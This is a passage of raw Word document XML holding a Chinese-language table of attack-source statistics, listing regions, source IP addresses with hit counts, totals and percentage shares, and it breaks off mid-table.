                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>攻击占比</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:shd w:color="auto" w:val="clear" w:fill="7EC0EE"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>对比分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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北京</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>110.42.128.90(213次)</w:t>
              <w:br/>
              <w:t>42.83.147.38(10次)</w:t>
              <w:br/>
              <w:t>1.202.112.62(1次)</w:t>
              <w:br/>
              <w:t>1.202.112.104(1次)</w:t>
              <w:br/>
              <w:t>1.202.114.12(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>231</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>24.42%</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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>亚太地区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>103.147.225.26(113次)</w:t>
              <w:br/>
              <w:t>103.148.150.134(8次)</w:t>
              <w:br/>
              <w:t>103.148.150.147(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>12.9%</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>广东</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>47.112.193.218(36次)</w:t>
              <w:br/>
              <w:t>119.29.119.174(24次)</w:t>
              <w:br/>
              <w:t>14.18.100.250(7次)</w:t>
              <w:br/>
              <w:t>112.94.252.105(1次)</w:t>
              <w:br/>
              <w:t>112.94.252.107(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>7.72%</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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>美国</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>206.253.164.182(29次)</w:t>
              <w:br/>
              <w:t>154.39.251.173(25次)</w:t>
              <w:br/>
              <w:t>18.118.208.56(1次)</w:t>
              <w:br/>
              <w:t>20.119.51.96(1次)</w:t>
              <w:br/>
              <w:t>22.96.19.174(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>6.34%</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>香港</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>124.71.107.29(29次)</w:t>
              <w:br/>
              <w:t>103.194.186.202(24次)</w:t>
              <w:br/>
              <w:t>128.1.137.17(3次)</w:t>
              <w:br/>
              <w:t>192.253.224.33(2次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>6.13%</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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>立陶宛</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>89.47.162.98(38次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>4.02%</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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>河南</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.192.213.76(19次)</w:t>
              <w:br/>
              <w:t>117.160.246.232(2次)</w:t>
              <w:br/>
              <w:t>61.52.76.178(1次)</w:t>
              <w:br/>
              <w:t>61.52.81.65(1次)</w:t>
              <w:br/>
              <w:t>61.52.84.168(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>3.59%</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>江苏</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>49.70.251.185(6次)</w:t>
              <w:br/>
              <w:t>43.248.130.211(5次)</w:t>
              <w:br/>
              <w:t>43.248.130.205(2次)</w:t>
              <w:br/>
              <w:t>112.80.136.135(1次)</w:t>
              <w:br/>
              <w:t>112.80.136.161(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2.64%</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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>罗马尼亚</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>89.40.73.14(25次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>2.64%</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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>宁夏</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>106.45.8.10(1次)</w:t>
              <w:br/>
              <w:t>106.45.8.34(1次)</w:t>
              <w:br/>
              <w:t>106.45.8.172(1次)</w:t>
              <w:br/>
              <w:t>106.45.8.214(1次)</w:t>
              <w:br/>
              <w:t>106.45.8.252(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.9%</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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>福建</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>27.159.66.46(2次)</w:t>
              <w:br/>
              <w:t>27.159.92.85(1次)</w:t>
              <w:br/>
              <w:t>36.248.89.0(1次)</w:t>
              <w:br/>
              <w:t>59.61.160.45(1次)</w:t>
              <w:br/>
              <w:t>59.61.160.141(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.8%</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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>四川</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>112.193.169.227(1次)</w:t>
              <w:br/>
              <w:t>112.193.170.127(1次)</w:t>
              <w:br/>
              <w:t>175.152.108.250(1次)</w:t>
              <w:br/>
              <w:t>175.152.109.222(1次)</w:t>
              <w:br/>
              <w:t>175.152.110.96(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.59%</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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>山西</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>110.177.176.190(1次)</w:t>
              <w:br/>
              <w:t>110.177.177.119(1次)</w:t>
              <w:br/>
              <w:t>110.177.177.208(1次)</w:t>
              <w:br/>
              <w:t>110.177.179.92(1次)</w:t>
              <w:br/>
              <w:t>110.177.180.92(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.48%</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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>广西</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>124.227.31.5(1次)</w:t>
              <w:br/>
              <w:t>124.227.31.28(1次)</w:t>
              <w:br/>
              <w:t>124.227.31.45(1次)</w:t>
              <w:br/>
              <w:t>124.227.31.102(1次)</w:t>
              <w:br/>
              <w:t>124.227.31.128(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.48%</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15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>新疆</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>60.13.136.10(2次)</w:t>
              <w:br/>
              <w:t>124.88.55.17(2次)</w:t>
              <w:br/>
              <w:t>49.113.96.35(1次)</w:t>
              <w:br/>
              <w:t>49.113.98.14(1次)</w:t>
              <w:br/>
              <w:t>49.113.98.146(1次)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>1.48%</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16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
              </w:rPr>
              <w:t>海南</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
